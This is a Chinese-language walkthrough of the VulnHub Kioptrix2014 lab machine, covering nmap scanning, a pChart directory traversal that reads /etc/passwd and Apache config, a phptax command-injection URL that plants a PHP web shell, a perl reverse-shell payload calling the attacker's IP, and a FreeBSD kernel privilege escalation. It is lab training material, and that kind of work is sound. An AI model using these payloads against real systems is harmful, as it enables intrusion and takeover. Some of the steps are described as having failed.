1.环境配置
下载地址:https://download.vulnhub.com/kioptrix/kiop2014.tar.bz2
攻击机kali:192.168.26.128(Nat模式)
靶机配置:Nat模式
这里注意,根据官网地址说明,需要我们先将网络适配器进行删除,再添加一个Nat模式,不然扫描不到该靶机。
2.渗透测试
信息收集
主机探测
nmap -sP 192.168.26.0/24
可以得知靶机ip地址:192.168.26.138
端口扫描
nmap -sS -sV -p- 192.168.26.138
显示靶机只开放了80端口跟8080端口,直接访问网站看看
目录扫描
dirbuster扫描----扫描不出什么
漏洞探测
访问网站,只有显示此界面
右键点击查看源代码
访问url中的地址,出现一些目录信息
接下来就是搜索下有没有pChart组件的漏洞:
利用searchsploit是可以搜到pChart组件有个漏洞可以利用的,版本号也刚好对上。
使用searchsploit 31173 --examine 查看利用方法:
可以发现有个目录穿越漏洞,直接访问
http://192.168.26.138/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
结果如下:
可以发现是FreeBSD系统,所以可以知道Apache配置文件目录为/usr/local/etc/apache22/httpd.conf
接下来还是利用目录穿越漏洞访问
http://192.168.0.103/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf
结果如下:
寻找一下看看有没有什么有用的信息
在结尾处可以看到,开启8080服务需要设置User-Agent的版本为Mozilla/4.0 Mozilla4_browser。之前扫描开放端口时候,也发现开启了8080端口,先访问下http://192.168.26.138:8080看看:
拒绝我们访问,下面我们直接通过抓包工具,修改下UA,再次访问看看返回值:
修改UA后返回正常,并且返回了"phptax"
或者直接使用curl命令修改UA包头
下面给出curl命令详解
漏洞利用(phptax)
接下来使用msf搜索下有无phptax的exp可用:
找到可以的payload,接下来就是利用该exp进行反弹shell
服了噢,没有得到shell,算了,换个方法
在网上搜phptax exploit
找到一个远程代码执行的漏洞利用信息,本想使用metasploit,但是要配置user-agent才能够正常访问,所以就干脆写个php一句话,然后反弹shell,经过研究上述提供的Poc信息可以直接远程代码执行,那么我们写一句话上去,具体exp如下
http://192.168.26.138:8080/phptax/drawimage.php?pfilez=xxx;echo%20%22%3C%3Fphp%20system(\$_GET['cmd']); %3F%3E%22%20>%20shell.php;&pdf=make
记得修改UA报头,改成 Mozilla/4.0 Mozilla4_browser,接着就能访问了
最终输入命令看是否能够执行成功
可以发现,执行成功,那么我们就可以上传shell直接反弹会话
通过这里的命令执行which查看了目标靶机是否存在Python或者perl环境,查询确认存在perl环境,但是使用perl反弹shell显示反弹成功后连接就被关闭了,使用nc反弹没有成功,便尝试使用nc传一个php反弹shell的php代码,然后访问这个反弹shell的php代码来反弹shell ,具体操作如下:
http://192.168.26.138:8080/phptax/drawimage.php?pfilez=xxx;perl%20-e%20%27use%20Socket;$i=%22192.168.26.128%22;$p=8123;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);};%27
但是这里连接的时候,又没有反应,只能看看下面博主的啦
VulnHub-Kioptrix2014(#5)-CSDN博客
提权(freebfd)
先查看靶机系统内核信息:
系统内核版本为 FreeBSD 9.0-RELEASE
接下来就是搜索该版本有无提权漏洞:
searchsploit FreeBSD
这边选取一个和内核版本相符的exp,就选第一个28718.c
接下来就是将该exp下载本地,传输到靶机上,编译执行就可以了
先下载exp:
searchsploit -p 28718.c
wget -c https://www.exploit-db.com/exploits/28718
接着利用nc发送该exp
kali发送端:
靶机接收端(还是要先cd进tmp目录):
其中192.168.26.138为kali的ip 8888为开启的监听端口。
靶机编译并执行exp:
还有个小插曲,这个exp最后还需要空一行,回到kali上将该exp最后新增一行:
然后保存退出,继续按照之前nc传输文件,再传输到靶机上。
靶机编译并执行exp:
总结
信息收集还是非常重要的,以及对网站的信息搜索,网站使用的中间件、系统之间的漏洞都可以拿来利用,但是我上面有不足之处,并没有获得webshell,提权就是根据FreeBSD的漏洞进行利用的